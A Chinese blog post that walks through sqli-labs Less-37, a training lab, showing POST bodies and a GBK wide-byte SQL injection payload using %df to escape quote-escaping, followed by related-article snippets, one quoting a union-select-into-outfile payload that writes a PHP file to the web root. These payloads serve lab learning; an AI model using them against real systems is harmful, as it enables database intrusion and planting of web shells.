sqli-labs (less-37)

最新推荐文章于 2024-02-24 20:58:57 发布
最新推荐文章于 2024-02-24 20:58:57 发布
阅读量404 收藏
点赞数
分类专栏: sqli-labs 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/114785697
版权

sqli-labs (less-37)

进入37关,输入用户名和密码

利用hackbar抓取POST内容

uname=admin'&passwd=admin&submit=Submit
uname=admin&passwd=admin'&submit=Submit



用户名和密码的位置单引号都被转义
直接查看源代码查看是否为GBK编码

确实使用了GBK编码,在单引号前面加入%df让单引号成功逃逸

确定回显位置

uname=a%df' union select 1,2#&passwd=admin&submit=Submit


接下来的步骤与less-34一模一样,这里我不具体介绍,具体过程请看我的less-34

super 硕
关注
专栏目录
sql-labs闯关32~37
qq_44663230的博客
09-04 2144
sql-labs闯关32~37 宽字节注入集合
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2044
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs之Less-37
m0_46315342的博客
06-04 421
                                          &nbs...
sqli-Labs————less-37
Fly_鹏程万里
05-20 814
Less-37查看一下源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <hea...
[靶场] SQLi-Labs Less37-Less45
3hex的博客
09-29 162
提供主要的语句,略去探测数据库名,表名,字段名的步骤。 41.Less37 请求方式 注入方式 类型 备注 POST Union注入,宽字节绕过 字符型 过滤特殊字符 1. 正常提交 uname=1&passwd=1 2. 语句报错 uname=1 1'2"3 &passwd=1 uname=1 1%a0'2"3 &passwd=1 uname=1 %a0' # &passwd=2 3. 执行注入的SQL un.
sqli-lab(37)
weixin_30296405的博客
06-01 143
0X01 看看源码 what is mean? 定义和用法 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。 下列字符受影响: \x00 \n \r \ ' " \x1a 如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。...
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1573
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs ----less-26---37--练习
代码审计
03-07 1003
sqli-labs————Less-26(绕空格、/*、#等) 该关卡提示空格和注释被转义,我们测试一下: http://www.sqli.com/Less-26/?id=1’报错 sqli-labs-master/Less-26/?id=1’ --+ 依旧报错, 我添加的注释不见了,应该是注释被转义成了空字符,我们换成;%00测试一下: http://www.sqli.com/Less-26/?id=1%20and%20sleep(4);%00 and应该被转义了 phpstorm
SQL注入之sql-labs-Less3~Less37
TenG的博客
12-22 1035
前言: 本篇为sql-labs系类第4、5关讲解,由于有些语法第一关已经讲过,所以本篇涉及到前面的知识不会讲解太细,不懂得语句可以参见此系列第一篇,不正确的地方欢迎指正。 关卡: Less-3、Less-4 正文: Less-3: 这里还是让sql语句在浏览器输出(自己在源码里面改,参见第一篇),可以看到sql语句id数值那里和第一关相比多了一对括号,如果我们只在数值后面加一个单引号就注入显然会报错: 注意看输入的sql语句,注释符注释掉了后面的括号,所以注入的时候要在单引号后面加上括号形成闭合,如图:
sqli-labs(32-37)
qq_43579362的博客
02-15 362
这六关都是关于宽字节注入的,分为GET/POST型,其实都一样,只不过POST要用一下burp 原理: mysql在使用GBK编码的时候,会认为两个字符为一个汉字,例如%aa%5c就是一个汉字(前一个ascii码大于128才能到汉字的范围)。我们在过滤 ' 的时候,往往利用的思路是将 ' 转换为 \' (转换的函数可以自定义,也可以用PHP自带函数)。 因此我们在此想办法将 ' 前面添加的\除掉,...
SQLI-labs靶场Less1-37详细学习记录(7400字总结)
身高两米不到的博客
04-16 3722
最近突发奇想,想把之前做过的靶场进行归纳,给自己一个交代给他人一份借鉴,于是就把sqli-labs靶场作为第二篇总结拿来祭笔。 第一关 前十关去年在知乎写过,再次修整一番。题目提示输入ID进行get传参,但需要注意的是这个靶场貌似是不区分大小写的,使用大写ID进行传参是没有任何回显的,只有输入id才可以传参,这点需要注意。 '报错 如果使用 # 注释不起作用。采用%23或者--+注释都可以#注释,order by爆字段数,4时报错,发现三个字段 union联合查询,判断回显点进行注入,..
对宽字节的深入了解
→_→
05-07 7076
01 背景知识 字符集 在了解宽字节注入之前,我们先来看一看字符集是什么。字符集也叫字符编码,是一种将符号转换为二进制数的映射关系。 几种常见的字符集: ASCII编码:单字节编码 latin1编码:单字节编码 gbk编码:使用一字节和双字节编码,0x00-0x7F范围内是一位,和 ASCII 保持一致。双字节的第一字节范围是0x81-0xFE UTF-8编码:使用一至四字节编码,0x......
Sqllibs-less32-37-宽字节
Xor0ne
07-14 498
32.less32-Bypass addslashes() 32.1、注入分析-过滤斜杠、单引号、双引号 function check_addslashes($string) { /*preg_quote():执行一个正则表达式的搜索和替换 preg_quote():转义正则表达式字符*/ /*转义任何斜杠*/ $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string); //escape any b
sqlilabs less-32~less-37
TA不懒,但还没有添加简介
07-27 466
sqlilabs less-32~less-37
SQL注入:sqli-labs靶场通关(1-37关)
热门推荐
qq_68163788的博客
02-03 1万+
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
基于Sqli-Labs靶场的SQL注入-32~37
Joker
01-09 1334
这篇博客我主要讲宽字节注入,包括一些转义函数的简单讲解。主要理解宽字节注入的原理即可。
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码字段。攻击者可以通过在输入框中输入特定的字符串来尝试绕过认证。 如果您想深入学习SQL注入攻击技术,sqli-labs-less1可能是一个很好的练习平台。但请注意,这个平台是为了学术目的而设计的,不要在未授权的情况下尝试对任何真实的系统进行SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值